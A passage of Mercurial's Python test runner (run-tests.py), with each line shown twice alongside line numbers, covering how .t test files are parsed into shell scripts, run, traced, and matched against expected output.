1463 Return a tuple (exitcode, output). output is None in debug mode.
1463 Return a tuple (exitcode, output). output is None in debug mode.
1464 """
1464 """
1465 if self._debug:
1465 if self._debug:
1466 proc = subprocess.Popen(
1466 proc = subprocess.Popen(
1467 _strpath(cmd), shell=True, cwd=_strpath(self._testtmp), env=env
1467 _strpath(cmd), shell=True, cwd=_strpath(self._testtmp), env=env
1468 )
1468 )
1469 ret = proc.wait()
1469 ret = proc.wait()
1470 return (ret, None)
1470 return (ret, None)
1471
1471
1472 proc = Popen4(cmd, self._testtmp, self._timeout, env)
1472 proc = Popen4(cmd, self._testtmp, self._timeout, env)
1473
1473
1474 def cleanup():
1474 def cleanup():
1475 terminate(proc)
1475 terminate(proc)
1476 ret = proc.wait()
1476 ret = proc.wait()
1477 if ret == 0:
1477 if ret == 0:
1478 ret = signal.SIGTERM << 8
1478 ret = signal.SIGTERM << 8
1479 killdaemons(env['DAEMON_PIDS'])
1479 killdaemons(env['DAEMON_PIDS'])
1480 return ret
1480 return ret
1481
1481
1482 proc.tochild.close()
1482 proc.tochild.close()
1483
1483
1484 try:
1484 try:
1485 output = proc.fromchild.read()
1485 output = proc.fromchild.read()
1486 except KeyboardInterrupt:
1486 except KeyboardInterrupt:
1487 vlog('# Handling keyboard interrupt')
1487 vlog('# Handling keyboard interrupt')
1488 cleanup()
1488 cleanup()
1489 raise
1489 raise
1490
1490
1491 ret = proc.wait()
1491 ret = proc.wait()
1492 if wifexited(ret):
1492 if wifexited(ret):
1493 ret = os.WEXITSTATUS(ret)
1493 ret = os.WEXITSTATUS(ret)
1494
1494
1495 if proc.timeout:
1495 if proc.timeout:
1496 ret = 'timeout'
1496 ret = 'timeout'
1497
1497
1498 if ret:
1498 if ret:
1499 killdaemons(env['DAEMON_PIDS'])
1499 killdaemons(env['DAEMON_PIDS'])
1500
1500
1501 for s, r in self._getreplacements():
1501 for s, r in self._getreplacements():
1502 output = re.sub(s, r, output)
1502 output = re.sub(s, r, output)
1503
1503
1504 if normalizenewlines:
1504 if normalizenewlines:
1505 output = output.replace(b'\r\n', b'\n')
1505 output = output.replace(b'\r\n', b'\n')
1506
1506
1507 return ret, output.splitlines(True)
1507 return ret, output.splitlines(True)
1508
1508
1509
1509
1510 class PythonTest(Test):
1510 class PythonTest(Test):
1511 """A Python-based test."""
1511 """A Python-based test."""
1512
1512
1513 @property
1513 @property
1514 def refpath(self):
1514 def refpath(self):
1515 return os.path.join(self._testdir, b'%s.out' % self.bname)
1515 return os.path.join(self._testdir, b'%s.out' % self.bname)
1516
1516
1517 def _run(self, env):
1517 def _run(self, env):
1518 py3switch = self._py3warnings and b' -3' or b''
1518 py3switch = self._py3warnings and b' -3' or b''
1519 # Quote the python(3) executable for Windows
1519 # Quote the python(3) executable for Windows
1520 cmd = b'"%s"%s "%s"' % (PYTHON, py3switch, self.path)
1520 cmd = b'"%s"%s "%s"' % (PYTHON, py3switch, self.path)
1521 vlog("# Running", cmd.decode("utf-8"))
1521 vlog("# Running", cmd.decode("utf-8"))
1522 normalizenewlines = os.name == 'nt'
1522 normalizenewlines = os.name == 'nt'
1523 result = self._runcommand(cmd, env, normalizenewlines=normalizenewlines)
1523 result = self._runcommand(cmd, env, normalizenewlines=normalizenewlines)
1524 if self._aborted:
1524 if self._aborted:
1525 raise KeyboardInterrupt()
1525 raise KeyboardInterrupt()
1526
1526
1527 return result
1527 return result
1528
1528
1529
1529
1530 # Some glob patterns apply only in some circumstances, so the script
1530 # Some glob patterns apply only in some circumstances, so the script
1531 # might want to remove (glob) annotations that otherwise should be
1531 # might want to remove (glob) annotations that otherwise should be
1532 # retained.
1532 # retained.
1533 checkcodeglobpats = [
1533 checkcodeglobpats = [
1534 # On Windows it looks like \ doesn't require a (glob), but we know
1534 # On Windows it looks like \ doesn't require a (glob), but we know
1535 # better.
1535 # better.
1536 re.compile(br'^pushing to \$TESTTMP/.*[^)]$'),
1536 re.compile(br'^pushing to \$TESTTMP/.*[^)]$'),
1537 re.compile(br'^moving \S+/.*[^)]$'),
1537 re.compile(br'^moving \S+/.*[^)]$'),
1538 re.compile(br'^pulling from \$TESTTMP/.*[^)]$'),
1538 re.compile(br'^pulling from \$TESTTMP/.*[^)]$'),
1539 # Not all platforms have 127.0.0.1 as loopback (though most do),
1539 # Not all platforms have 127.0.0.1 as loopback (though most do),
1540 # so we always glob that too.
1540 # so we always glob that too.
1541 re.compile(br'.*\$LOCALIP.*$'),
1541 re.compile(br'.*\$LOCALIP.*$'),
1542 ]
1542 ]
1543
1543
1544 bchr = chr
1544 bchr = chr
1545 if PYTHON3:
1545 if PYTHON3:
1546 bchr = lambda x: bytes([x])
1546 bchr = lambda x: bytes([x])
1547
1547
1548 WARN_UNDEFINED = 1
1548 WARN_UNDEFINED = 1
1549 WARN_YES = 2
1549 WARN_YES = 2
1550 WARN_NO = 3
1550 WARN_NO = 3
1551
1551
1552 MARK_OPTIONAL = b" (?)\n"
1552 MARK_OPTIONAL = b" (?)\n"
1553
1553
1554
1554
1555 def isoptional(line):
1555 def isoptional(line):
1556 return line.endswith(MARK_OPTIONAL)
1556 return line.endswith(MARK_OPTIONAL)
1557
1557
1558
1558
1559 class TTest(Test):
1559 class TTest(Test):
1560 """A "t test" is a test backed by a .t file."""
1560 """A "t test" is a test backed by a .t file."""
1561
1561
1562 SKIPPED_PREFIX = b'skipped: '
1562 SKIPPED_PREFIX = b'skipped: '
1563 FAILED_PREFIX = b'hghave check failed: '
1563 FAILED_PREFIX = b'hghave check failed: '
1564 NEEDESCAPE = re.compile(br'[\x00-\x08\x0b-\x1f\x7f-\xff]').search
1564 NEEDESCAPE = re.compile(br'[\x00-\x08\x0b-\x1f\x7f-\xff]').search
1565
1565
1566 ESCAPESUB = re.compile(br'[\x00-\x08\x0b-\x1f\\\x7f-\xff]').sub
1566 ESCAPESUB = re.compile(br'[\x00-\x08\x0b-\x1f\\\x7f-\xff]').sub
1567 ESCAPEMAP = dict((bchr(i), br'\x%02x' % i) for i in range(256))
1567 ESCAPEMAP = dict((bchr(i), br'\x%02x' % i) for i in range(256))
1568 ESCAPEMAP.update({b'\\': b'\\\\', b'\r': br'\r'})
1568 ESCAPEMAP.update({b'\\': b'\\\\', b'\r': br'\r'})
1569
1569
1570 def __init__(self, path, *args, **kwds):
1570 def __init__(self, path, *args, **kwds):
1571 # accept an extra "case" parameter
1571 # accept an extra "case" parameter
1572 case = kwds.pop('case', [])
1572 case = kwds.pop('case', [])
1573 self._case = case
1573 self._case = case
1574 self._allcases = {x for y in parsettestcases(path) for x in y}
1574 self._allcases = {x for y in parsettestcases(path) for x in y}
1575 super(TTest, self).__init__(path, *args, **kwds)
1575 super(TTest, self).__init__(path, *args, **kwds)
1576 if case:
1576 if case:
1577 casepath = b'#'.join(case)
1577 casepath = b'#'.join(case)
1578 self.name = '%s#%s' % (self.name, _strpath(casepath))
1578 self.name = '%s#%s' % (self.name, _strpath(casepath))
1579 self.errpath = b'%s#%s.err' % (self.errpath[:-4], casepath)
1579 self.errpath = b'%s#%s.err' % (self.errpath[:-4], casepath)
1580 self._tmpname += b'-%s' % casepath
1580 self._tmpname += b'-%s' % casepath
1581 self._have = {}
1581 self._have = {}
1582
1582
1583 @property
1583 @property
1584 def refpath(self):
1584 def refpath(self):
1585 return os.path.join(self._testdir, self.bname)
1585 return os.path.join(self._testdir, self.bname)
1586
1586
1587 def _run(self, env):
1587 def _run(self, env):
1588 with open(self.path, 'rb') as f:
1588 with open(self.path, 'rb') as f:
1589 lines = f.readlines()
1589 lines = f.readlines()
1590
1590
1591 # .t file is both reference output and the test input, keep reference
1591 # .t file is both reference output and the test input, keep reference
1592 # output updated with the the test input. This avoids some race
1592 # output updated with the the test input. This avoids some race
1593 # conditions where the reference output does not match the actual test.
1593 # conditions where the reference output does not match the actual test.
1594 if self._refout is not None:
1594 if self._refout is not None:
1595 self._refout = lines
1595 self._refout = lines
1596
1596
1597 salt, script, after, expected = self._parsetest(lines)
1597 salt, script, after, expected = self._parsetest(lines)
1598
1598
1599 # Write out the generated script.
1599 # Write out the generated script.
1600 fname = b'%s.sh' % self._testtmp
1600 fname = b'%s.sh' % self._testtmp
1601 with open(fname, 'wb') as f:
1601 with open(fname, 'wb') as f:
1602 for l in script:
1602 for l in script:
1603 f.write(l)
1603 f.write(l)
1604
1604
1605 cmd = b'%s "%s"' % (self._shell, fname)
1605 cmd = b'%s "%s"' % (self._shell, fname)
1606 vlog("# Running", cmd.decode("utf-8"))
1606 vlog("# Running", cmd.decode("utf-8"))
1607
1607
1608 exitcode, output = self._runcommand(cmd, env)
1608 exitcode, output = self._runcommand(cmd, env)
1609
1609
1610 if self._aborted:
1610 if self._aborted:
1611 raise KeyboardInterrupt()
1611 raise KeyboardInterrupt()
1612
1612
1613 # Do not merge output if skipped. Return hghave message instead.
1613 # Do not merge output if skipped. Return hghave message instead.
1614 # Similarly, with --debug, output is None.
1614 # Similarly, with --debug, output is None.
1615 if exitcode == self.SKIPPED_STATUS or output is None:
1615 if exitcode == self.SKIPPED_STATUS or output is None:
1616 return exitcode, output
1616 return exitcode, output
1617
1617
1618 return self._processoutput(exitcode, output, salt, after, expected)
1618 return self._processoutput(exitcode, output, salt, after, expected)
1619
1619
1620 def _hghave(self, reqs):
1620 def _hghave(self, reqs):
1621 allreqs = b' '.join(reqs)
1621 allreqs = b' '.join(reqs)
1622
1622
1623 self._detectslow(reqs)
1623 self._detectslow(reqs)
1624
1624
1625 if allreqs in self._have:
1625 if allreqs in self._have:
1626 return self._have.get(allreqs)
1626 return self._have.get(allreqs)
1627
1627
1628 # TODO do something smarter when all other uses of hghave are gone.
1628 # TODO do something smarter when all other uses of hghave are gone.
1629 runtestdir = os.path.abspath(os.path.dirname(_bytespath(__file__)))
1629 runtestdir = os.path.abspath(os.path.dirname(_bytespath(__file__)))
1630 tdir = runtestdir.replace(b'\\', b'/')
1630 tdir = runtestdir.replace(b'\\', b'/')
1631 proc = Popen4(
1631 proc = Popen4(
1632 b'%s -c "%s/hghave %s"' % (self._shell, tdir, allreqs),
1632 b'%s -c "%s/hghave %s"' % (self._shell, tdir, allreqs),
1633 self._testtmp,
1633 self._testtmp,
1634 0,
1634 0,
1635 self._getenv(),
1635 self._getenv(),
1636 )
1636 )
1637 stdout, stderr = proc.communicate()
1637 stdout, stderr = proc.communicate()
1638 ret = proc.wait()
1638 ret = proc.wait()
1639 if wifexited(ret):
1639 if wifexited(ret):
1640 ret = os.WEXITSTATUS(ret)
1640 ret = os.WEXITSTATUS(ret)
1641 if ret == 2:
1641 if ret == 2:
1642 print(stdout.decode('utf-8'))
1642 print(stdout.decode('utf-8'))
1643 sys.exit(1)
1643 sys.exit(1)
1644
1644
1645 if ret != 0:
1645 if ret != 0:
1646 self._have[allreqs] = (False, stdout)
1646 self._have[allreqs] = (False, stdout)
1647 return False, stdout
1647 return False, stdout
1648
1648
1649 self._have[allreqs] = (True, None)
1649 self._have[allreqs] = (True, None)
1650 return True, None
1650 return True, None
1651
1651
1652 def _detectslow(self, reqs):
1652 def _detectslow(self, reqs):
1653 """update the timeout of slow test when appropriate"""
1653 """update the timeout of slow test when appropriate"""
1654 if b'slow' in reqs:
1654 if b'slow' in reqs:
1655 self._timeout = self._slowtimeout
1655 self._timeout = self._slowtimeout
1656
1656
1657 def _iftest(self, args):
1657 def _iftest(self, args):
1658 # implements "#if"
1658 # implements "#if"
1659 reqs = []
1659 reqs = []
1660 for arg in args:
1660 for arg in args:
1661 if arg.startswith(b'no-') and arg[3:] in self._allcases:
1661 if arg.startswith(b'no-') and arg[3:] in self._allcases:
1662 if arg[3:] in self._case:
1662 if arg[3:] in self._case:
1663 return False
1663 return False
1664 elif arg in self._allcases:
1664 elif arg in self._allcases:
1665 if arg not in self._case:
1665 if arg not in self._case:
1666 return False
1666 return False
1667 else:
1667 else:
1668 reqs.append(arg)
1668 reqs.append(arg)
1669 self._detectslow(reqs)
1669 self._detectslow(reqs)
1670 return self._hghave(reqs)[0]
1670 return self._hghave(reqs)[0]
1671
1671
1672 def _parsetest(self, lines):
1672 def _parsetest(self, lines):
1673 # We generate a shell script which outputs unique markers to line
1673 # We generate a shell script which outputs unique markers to line
1674 # up script results with our source. These markers include input
1674 # up script results with our source. These markers include input
1675 # line number and the last return code.
1675 # line number and the last return code.
1676 salt = b"SALT%d" % time.time()
1676 salt = b"SALT%d" % time.time()
1677
1677
1678 def addsalt(line, inpython):
1678 def addsalt(line, inpython):
1679 if inpython:
1679 if inpython:
1680 script.append(b'%s %d 0\n' % (salt, line))
1680 script.append(b'%s %d 0\n' % (salt, line))
1681 else:
1681 else:
1682 script.append(b'echo %s %d $?\n' % (salt, line))
1682 script.append(b'echo %s %d $?\n' % (salt, line))
1683
1683
1684 activetrace = []
1684 activetrace = []
1685 session = str(uuid.uuid4())
1685 session = str(uuid.uuid4())
1686 if PYTHON3:
1686 if PYTHON3:
1687 session = session.encode('ascii')
1687 session = session.encode('ascii')
1688 hgcatapult = os.getenv('HGTESTCATAPULTSERVERPIPE') or os.getenv(
1688 hgcatapult = os.getenv('HGTESTCATAPULTSERVERPIPE') or os.getenv(
1689 'HGCATAPULTSERVERPIPE'
1689 'HGCATAPULTSERVERPIPE'
1690 )
1690 )
1691
1691
1692 def toggletrace(cmd=None):
1692 def toggletrace(cmd=None):
1693 if not hgcatapult or hgcatapult == os.devnull:
1693 if not hgcatapult or hgcatapult == os.devnull:
1694 return
1694 return
1695
1695
1696 if activetrace:
1696 if activetrace:
1697 script.append(
1697 script.append(
1698 b'echo END %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n'
1698 b'echo END %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n'
1699 % (session, activetrace[0])
1699 % (session, activetrace[0])
1700 )
1700 )
1701 if cmd is None:
1701 if cmd is None:
1702 return
1702 return
1703
1703
1704 if isinstance(cmd, str):
1704 if isinstance(cmd, str):
1705 quoted = shellquote(cmd.strip())
1705 quoted = shellquote(cmd.strip())
1706 else:
1706 else:
1707 quoted = shellquote(cmd.strip().decode('utf8')).encode('utf8')
1707 quoted = shellquote(cmd.strip().decode('utf8')).encode('utf8')
1708 quoted = quoted.replace(b'\\', b'\\\\')
1708 quoted = quoted.replace(b'\\', b'\\\\')
1709 script.append(
1709 script.append(
1710 b'echo START %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n'
1710 b'echo START %s %s >> "$HGTESTCATAPULTSERVERPIPE"\n'
1711 % (session, quoted)
1711 % (session, quoted)
1712 )
1712 )
1713 activetrace[0:] = [quoted]
1713 activetrace[0:] = [quoted]
1714
1714
1715 script = []
1715 script = []
1716
1716
1717 # After we run the shell script, we re-unify the script output
1717 # After we run the shell script, we re-unify the script output
1718 # with non-active parts of the source, with synchronization by our
1718 # with non-active parts of the source, with synchronization by our
1719 # SALT line number markers. The after table contains the non-active
1719 # SALT line number markers. The after table contains the non-active
1720 # components, ordered by line number.
1720 # components, ordered by line number.
1721 after = {}
1721 after = {}
1722
1722
1723 # Expected shell script output.
1723 # Expected shell script output.
1724 expected = {}
1724 expected = {}
1725
1725
1726 pos = prepos = -1
1726 pos = prepos = -1
1727
1727
1728 # True or False when in a true or false conditional section
1728 # True or False when in a true or false conditional section
1729 skipping = None
1729 skipping = None
1730
1730
1731 # We keep track of whether or not we're in a Python block so we
1731 # We keep track of whether or not we're in a Python block so we
1732 # can generate the surrounding doctest magic.
1732 # can generate the surrounding doctest magic.
1733 inpython = False
1733 inpython = False
1734
1734
1735 if self._debug:
1735 if self._debug:
1736 script.append(b'set -x\n')
1736 script.append(b'set -x\n')
1737 if self._hgcommand != b'hg':
1737 if self._hgcommand != b'hg':
1738 script.append(b'alias hg="%s"\n' % self._hgcommand)
1738 script.append(b'alias hg="%s"\n' % self._hgcommand)
1739 if os.getenv('MSYSTEM'):
1739 if os.getenv('MSYSTEM'):
1740 script.append(b'alias pwd="pwd -W"\n')
1740 script.append(b'alias pwd="pwd -W"\n')
1741
1741
1742 if hgcatapult and hgcatapult != os.devnull:
1742 if hgcatapult and hgcatapult != os.devnull:
1743 if PYTHON3:
1743 if PYTHON3:
1744 hgcatapult = hgcatapult.encode('utf8')
1744 hgcatapult = hgcatapult.encode('utf8')
1745 cataname = self.name.encode('utf8')
1745 cataname = self.name.encode('utf8')
1746 else:
1746 else:
1747 cataname = self.name
1747 cataname = self.name
1748
1748
1749 # Kludge: use a while loop to keep the pipe from getting
1749 # Kludge: use a while loop to keep the pipe from getting
1750 # closed by our echo commands. The still-running file gets
1750 # closed by our echo commands. The still-running file gets
1751 # reaped at the end of the script, which causes the while
1751 # reaped at the end of the script, which causes the while
1752 # loop to exit and closes the pipe. Sigh.
1752 # loop to exit and closes the pipe. Sigh.
1753 script.append(
1753 script.append(
1754 b'rtendtracing() {\n'
1754 b'rtendtracing() {\n'
1755 b' echo END %(session)s %(name)s >> %(catapult)s\n'
1755 b' echo END %(session)s %(name)s >> %(catapult)s\n'
1756 b' rm -f "$TESTTMP/.still-running"\n'
1756 b' rm -f "$TESTTMP/.still-running"\n'
1757 b'}\n'
1757 b'}\n'
1758 b'trap "rtendtracing" 0\n'
1758 b'trap "rtendtracing" 0\n'
1759 b'touch "$TESTTMP/.still-running"\n'
1759 b'touch "$TESTTMP/.still-running"\n'
1760 b'while [ -f "$TESTTMP/.still-running" ]; do sleep 1; done '
1760 b'while [ -f "$TESTTMP/.still-running" ]; do sleep 1; done '
1761 b'> %(catapult)s &\n'
1761 b'> %(catapult)s &\n'
1762 b'HGCATAPULTSESSION=%(session)s ; export HGCATAPULTSESSION\n'
1762 b'HGCATAPULTSESSION=%(session)s ; export HGCATAPULTSESSION\n'
1763 b'echo START %(session)s %(name)s >> %(catapult)s\n'
1763 b'echo START %(session)s %(name)s >> %(catapult)s\n'
1764 % {
1764 % {
1765 b'name': cataname,
1765 b'name': cataname,
1766 b'session': session,
1766 b'session': session,
1767 b'catapult': hgcatapult,
1767 b'catapult': hgcatapult,
1768 }
1768 }
1769 )
1769 )
1770
1770
1771 if self._case:
1771 if self._case:
1772 casestr = b'#'.join(self._case)
1772 casestr = b'#'.join(self._case)
1773 if isinstance(self._case, str):
1773 if isinstance(self._case, str):
1774 quoted = shellquote(casestr)
1774 quoted = shellquote(casestr)
1775 else:
1775 else:
1776 quoted = shellquote(casestr.decode('utf8')).encode('utf8')
1776 quoted = shellquote(casestr.decode('utf8')).encode('utf8')
1777 script.append(b'TESTCASE=%s\n' % quoted)
1777 script.append(b'TESTCASE=%s\n' % quoted)
1778 script.append(b'export TESTCASE\n')
1778 script.append(b'export TESTCASE\n')
1779
1779
1780 n = 0
1780 n = 0
1781 for n, l in enumerate(lines):
1781 for n, l in enumerate(lines):
1782 if not l.endswith(b'\n'):
1782 if not l.endswith(b'\n'):
1783 l += b'\n'
1783 l += b'\n'
1784 if l.startswith(b'#require'):
1784 if l.startswith(b'#require'):
1785 lsplit = l.split()
1785 lsplit = l.split()
1786 if len(lsplit) < 2 or lsplit[0] != b'#require':
1786 if len(lsplit) < 2 or lsplit[0] != b'#require':
1787 after.setdefault(pos, []).append(
1787 after.setdefault(pos, []).append(
1788 b' !!! invalid #require\n'
1788 b' !!! invalid #require\n'
1789 )
1789 )
1790 if not skipping:
1790 if not skipping:
1791 haveresult, message = self._hghave(lsplit[1:])
1791 haveresult, message = self._hghave(lsplit[1:])
1792 if not haveresult:
1792 if not haveresult:
1793 script = [b'echo "%s"\nexit 80\n' % message]
1793 script = [b'echo "%s"\nexit 80\n' % message]
1794 break
1794 break
1795 after.setdefault(pos, []).append(l)
1795 after.setdefault(pos, []).append(l)
1796 elif l.startswith(b'#if'):
1796 elif l.startswith(b'#if'):
1797 lsplit = l.split()
1797 lsplit = l.split()
1798 if len(lsplit) < 2 or lsplit[0] != b'#if':
1798 if len(lsplit) < 2 or lsplit[0] != b'#if':
1799 after.setdefault(pos, []).append(b' !!! invalid #if\n')
1799 after.setdefault(pos, []).append(b' !!! invalid #if\n')
1800 if skipping is not None:
1800 if skipping is not None:
1801 after.setdefault(pos, []).append(b' !!! nested #if\n')
1801 after.setdefault(pos, []).append(b' !!! nested #if\n')
1802 skipping = not self._iftest(lsplit[1:])
1802 skipping = not self._iftest(lsplit[1:])
1803 after.setdefault(pos, []).append(l)
1803 after.setdefault(pos, []).append(l)
1804 elif l.startswith(b'#else'):
1804 elif l.startswith(b'#else'):
1805 if skipping is None:
1805 if skipping is None:
1806 after.setdefault(pos, []).append(b' !!! missing #if\n')
1806 after.setdefault(pos, []).append(b' !!! missing #if\n')
1807 skipping = not skipping
1807 skipping = not skipping
1808 after.setdefault(pos, []).append(l)
1808 after.setdefault(pos, []).append(l)
1809 elif l.startswith(b'#endif'):
1809 elif l.startswith(b'#endif'):
1810 if skipping is None:
1810 if skipping is None:
1811 after.setdefault(pos, []).append(b' !!! missing #if\n')
1811 after.setdefault(pos, []).append(b' !!! missing #if\n')
1812 skipping = None
1812 skipping = None
1813 after.setdefault(pos, []).append(l)
1813 after.setdefault(pos, []).append(l)
1814 elif skipping:
1814 elif skipping:
1815 after.setdefault(pos, []).append(l)
1815 after.setdefault(pos, []).append(l)
1816 elif l.startswith(b' >>> '): # python inlines
1816 elif l.startswith(b' >>> '): # python inlines
1817 after.setdefault(pos, []).append(l)
1817 after.setdefault(pos, []).append(l)
1818 prepos = pos
1818 prepos = pos
1819 pos = n
1819 pos = n
1820 if not inpython:
1820 if not inpython:
1821 # We've just entered a Python block. Add the header.
1821 # We've just entered a Python block. Add the header.
1822 inpython = True
1822 inpython = True
1823 addsalt(prepos, False) # Make sure we report the exit code.
1823 addsalt(prepos, False) # Make sure we report the exit code.
1824 script.append(b'"%s" -m heredoctest <<EOF\n' % PYTHON)
1824 script.append(b'"%s" -m heredoctest <<EOF\n' % PYTHON)
1825 addsalt(n, True)
1825 addsalt(n, True)
1826 script.append(l[2:])
1826 script.append(l[2:])
1827 elif l.startswith(b' ... '): # python inlines
1827 elif l.startswith(b' ... '): # python inlines
1828 after.setdefault(prepos, []).append(l)
1828 after.setdefault(prepos, []).append(l)
1829 script.append(l[2:])
1829 script.append(l[2:])
1830 elif l.startswith(b' $ '): # commands
1830 elif l.startswith(b' $ '): # commands
1831 if inpython:
1831 if inpython:
1832 script.append(b'EOF\n')
1832 script.append(b'EOF\n')
1833 inpython = False
1833 inpython = False
1834 after.setdefault(pos, []).append(l)
1834 after.setdefault(pos, []).append(l)
1835 prepos = pos
1835 prepos = pos
1836 pos = n
1836 pos = n
1837 addsalt(n, False)
1837 addsalt(n, False)
1838 rawcmd = l[4:]
1838 rawcmd = l[4:]
1839 cmd = rawcmd.split()
1839 cmd = rawcmd.split()
1840 toggletrace(rawcmd)
1840 toggletrace(rawcmd)
1841 if len(cmd) == 2 and cmd[0] == b'cd':
1841 if len(cmd) == 2 and cmd[0] == b'cd':
1842 rawcmd = b'cd %s || exit 1\n' % cmd[1]
1842 rawcmd = b'cd %s || exit 1\n' % cmd[1]
1843 script.append(rawcmd)
1843 script.append(rawcmd)
1844 elif l.startswith(b' > '): # continuations
1844 elif l.startswith(b' > '): # continuations
1845 after.setdefault(prepos, []).append(l)
1845 after.setdefault(prepos, []).append(l)
1846 script.append(l[4:])
1846 script.append(l[4:])
1847 elif l.startswith(b' '): # results
1847 elif l.startswith(b' '): # results
1848 # Queue up a list of expected results.
1848 # Queue up a list of expected results.
1849 expected.setdefault(pos, []).append(l[2:])
1849 expected.setdefault(pos, []).append(l[2:])
1850 else:
1850 else:
1851 if inpython:
1851 if inpython:
1852 script.append(b'EOF\n')
1852 script.append(b'EOF\n')
1853 inpython = False
1853 inpython = False
1854 # Non-command/result. Queue up for merged output.
1854 # Non-command/result. Queue up for merged output.
1855 after.setdefault(pos, []).append(l)
1855 after.setdefault(pos, []).append(l)
1856
1856
1857 if inpython:
1857 if inpython:
1858 script.append(b'EOF\n')
1858 script.append(b'EOF\n')
1859 if skipping is not None:
1859 if skipping is not None:
1860 after.setdefault(pos, []).append(b' !!! missing #endif\n')
1860 after.setdefault(pos, []).append(b' !!! missing #endif\n')
1861 addsalt(n + 1, False)
1861 addsalt(n + 1, False)
1862 # Need to end any current per-command trace
1862 # Need to end any current per-command trace
1863 if activetrace:
1863 if activetrace:
1864 toggletrace()
1864 toggletrace()
1865 return salt, script, after, expected
1865 return salt, script, after, expected
1866
1866
1867 def _processoutput(self, exitcode, output, salt, after, expected):
1867 def _processoutput(self, exitcode, output, salt, after, expected):
1868 # Merge the script output back into a unified test.
1868 # Merge the script output back into a unified test.
1869 warnonly = WARN_UNDEFINED # 1: not yet; 2: yes; 3: for sure not
1869 warnonly = WARN_UNDEFINED # 1: not yet; 2: yes; 3: for sure not
1870 if exitcode != 0:
1870 if exitcode != 0:
1871 warnonly = WARN_NO
1871 warnonly = WARN_NO
1872
1872
1873 pos = -1
1873 pos = -1
1874 postout = []
1874 postout = []
1875 for out_rawline in output:
1875 for out_rawline in output:
1876 out_line, cmd_line = out_rawline, None
1876 out_line, cmd_line = out_rawline, None
1877 if salt in out_rawline:
1877 if salt in out_rawline:
1878 out_line, cmd_line = out_rawline.split(salt, 1)
1878 out_line, cmd_line = out_rawline.split(salt, 1)
1879
1879
1880 pos, postout, warnonly = self._process_out_line(
1880 pos, postout, warnonly = self._process_out_line(
1881 out_line, pos, postout, expected, warnonly
1881 out_line, pos, postout, expected, warnonly
1882 )
1882 )
1883 pos, postout = self._process_cmd_line(cmd_line, pos, postout, after)
1883 pos, postout = self._process_cmd_line(cmd_line, pos, postout, after)
1884
1884
1885 if pos in after:
1885 if pos in after:
1886 postout += after.pop(pos)
1886 postout += after.pop(pos)
1887
1887
1888 if warnonly == WARN_YES:
1888 if warnonly == WARN_YES:
1889 exitcode = False # Set exitcode to warned.
1889 exitcode = False # Set exitcode to warned.
1890
1890
1891 return exitcode, postout
1891 return exitcode, postout
1892
1892
1893 def _process_out_line(self, out_line, pos, postout, expected, warnonly):
1893 def _process_out_line(self, out_line, pos, postout, expected, warnonly):
1894 while out_line:
1894 while out_line:
1895 if not out_line.endswith(b'\n'):
1895 if not out_line.endswith(b'\n'):
1896 out_line += b' (no-eol)\n'
1896 out_line += b' (no-eol)\n'
1897
1897
1898 # Find the expected output at the current position.
1898 # Find the expected output at the current position.
1899 els = [None]
1899 els = [None]
1900 if expected.get(pos, None):
1900 if expected.get(pos, None):
1901 els = expected[pos]
1901 els = expected[pos]
1902
1902
1903 optional = []
1903 optional = []
1904 for i, el in enumerate(els):
1904 for i, el in enumerate(els):
1905 r = False
1905 r = False
1906 if el:
1906 if el:
1907 r, exact = self.linematch(el, out_line)
1907 r, exact = self.linematch(el, out_line)
1908 if isinstance(r, str):
1908 if isinstance(r, str):
1909 if r == '-glob':
1909 if r == '-glob':
1910 out_line = ''.join(el.rsplit(' (glob)', 1))
1910 out_line = ''.join(el.rsplit(' (glob)', 1))
1911 r = '' # Warn only this line.
1911 r = '' # Warn only this line.
1912 elif r == "retry":
1912 elif r == "retry":
1913 postout.append(b' ' + el)
1913 postout.append(b' ' + el)
1914 else:
1914 else:
1915 log('\ninfo, unknown linematch result: %r\n' % r)
1915 log('\ninfo, unknown linematch result: %r\n' % r)
1916 r = False
1916 r = False
1917 if r:
1917 if r:
1918 els.pop(i)
1918 els.pop(i)
1919 break
1919 break
1920 if el:
1920 if el:
1921 if isoptional(el):
1921 if isoptional(el):
1922 optional.append(i)
1922 optional.append(i)
1923 else:
1923 else:
1924 m = optline.match(el)
1924 m = optline.match(el)
1925 if m:
1925 if m:
1926 conditions = [c for c in m.group(2).split(b' ')]
1926 conditions = [c for c in m.group(2).split(b' ')]
1927
1927
1928 if not self._iftest(conditions):
1928 if not self._iftest(conditions):
1929 optional.append(i)
1929 optional.append(i)
1930 if exact:
1930 if exact:
1931 # Don't allow line to be matches against a later
1931 # Don't allow line to be matches against a later
1932 # line in the output
1932 # line in the output
1933 els.pop(i)
1933 els.pop(i)
1934 break
1934 break
1935
1935
1936 if r:
1936 if r:
1937 if r == "retry":
1937 if r == "retry":
1938 continue
1938 continue
1939 # clean up any optional leftovers
1939 # clean up any optional leftovers
1940 for i in optional:
1940 for i in optional:
1941 postout.append(b' ' + els[i])
1941 postout.append(b' ' + els[i])
1942 for i in reversed(optional):
1942 for i in reversed(optional):
1943 del els[i]
1943 del els[i]
1944 postout.append(b' ' + el)
1944 postout.append(b' ' + el)
1945 else:
1945 else:
1946 if self.NEEDESCAPE(out_line):
1946 if self.NEEDESCAPE(out_line):
1947 out_line = TTest._stringescape(
1947 out_line = TTest._stringescape(
1948 b'%s (esc)\n' % out_line.rstrip(b'\n')
1948 b'%s (esc)\n' % out_line.rstrip(b'\n')
1949 )
1949 )
1950 postout.append(b' ' + out_line) # Let diff deal with it.
1950 postout.append(b' ' + out_line) # Let diff deal with it.
1951 if r != '': # If line failed.
1951 if r != '': # If line failed.
1952 warnonly = WARN_NO
1952 warnonly = WARN_NO
1953 elif warnonly == WARN_UNDEFINED:
1953 elif warnonly == WARN_UNDEFINED:
1954 warnonly = WARN_YES
1954 warnonly = WARN_YES
1955 break
1955 break
1956 else:
1956 else:
1957 # clean up any optional leftovers
1957 # clean up any optional leftovers
1958 while expected.get(pos, None):
1958 while expected.get(pos, None):
1959 el = expected[pos].pop(0)
1959 el = expected[pos].pop(0)
1960 if el:
1960 if el:
1961 if not isoptional(el):
1961 if not isoptional(el):
1962 m = optline.match(el)
1962 m = optline.match(el)
1963 if m:
1963 if m:
1964 conditions = [c for c in m.group(2).split(b' ')]
1964 conditions = [c for c in m.group(2).split(b' ')]
1965
1965
1966 if self._iftest(conditions):
1966 if self._iftest(conditions):
1967 # Don't append as optional line
1967 # Don't append as optional line
1968 continue
1968 continue
1969 else:
1969 else:
1970 continue
